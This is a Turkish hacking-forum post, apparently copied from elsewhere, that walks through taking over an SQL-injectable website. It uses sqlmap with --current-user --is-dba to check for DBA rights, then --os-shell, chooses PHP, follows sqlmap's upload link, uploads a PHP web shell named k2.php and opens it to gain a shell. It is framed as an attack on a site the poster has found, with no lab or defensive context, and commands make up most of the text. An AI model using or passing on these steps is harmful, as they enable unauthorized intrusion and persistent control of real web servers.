FORUM | BeyazHacker.com

Beyaz Hacker Forum web sitesine hoşgeldiniz. Chat, konu açma, üyeler ile birebir irtibat ve daha destek için lütfen üye olun.

SQL Açıklı Siteye SHELL Atma

Aytlogo_Luxer

Asteğmen
Katılım
6 Ocak 2020
Mesajlar
42
Tepkime puanı
23
Puanları
8
İlk başta bir sql açıklı site bulduk ve bu açıklı sitemize shell sokmak istiyoruz.Öncelikle sitemizde bir sqlmap sorgusu yapıyoruz ancak farklı parametreleri kullanarak bu işlemi gerçekleştiriyoruz.

Bu sefer --dbs komutu yerine, --current-user --is-dba komutunu kullanacağız.Örnek ile gösterecek olursak;

Normalde bu kodu kullanıyorduk;

sqlmap -u "www.sqlaciklisite.com/php?id=" --dbs

Bu sefer bu kod yerine aşağıdaki kodu kullanacağız;

Kullanacağımız Kodumuz:

sqlmap -u "www..sqlörneksite.com/php?id=" --current-user --is-dba

komutu ile başlatabiliriz. Biraz bekledikten sonra eğer aşağıdaki gibi bir kod görürseniz;


Kodumuz:

--> current user is DBA : True <--


Demektir ki shell sokmaya çok yakınsınız.Buradan sonra artık işler daha da kolaylaşmaya başlıyor;

Kodumuz:

sqlmap -u "www..sqlörneksite.com/php?id=" --os-shell

Bu kodu yazdıktan ve sonrasında enterladıktan sonra sitenin yazılmış olduğu dili soruyor.;

Ana sayfasına ulaştık yani sayfa php dili ile yazılmış.Sqlmap size şöyle
seçenekler verir;

(Sqlmap'e benzemesi açıdan bu işaretleri koydum.)


|1|ASP
|2|PHP
|3|ASPX
|4|JSP


Bu durumda sitemizin dilini yani php'yi seçmemiz gerekiyor.Hedef sitemiz "php" diliyle yazılmış çünkü.

Enterladıktan sonra karşımıza info yani bilgi veren bir kısım gelmesi lazım,o infoların arasında bir link olacak.


İnfo da bir link verilmiştir eğer gördüyseniz.Linke gidiyoruz ve karşımıza "shell" upload edilebilen bir yer geliyor.


Artık shellimizi upload edebiliriz.Upload ettikten sonra linkte .php yada .asp yada .aspx den önceki yazan yazıyı silip shellin adını yazıp

enter tuşuna basmamız yeterlidir Örnek olarak;


Sitemizin adresi:

http:://www.sqlörneksite.com/events/i/tmpuhvef.php

Buraya upload ediyoruz mesela, shellimizin adı k2.php olsun


Sitemizin adresi:

http:://www.sqlörneksite.com/events/...li/k2.php


Ve Shelldeyiz.

Saygılarımla.. HazerHan

Not: Alıntıdır.
 
Üst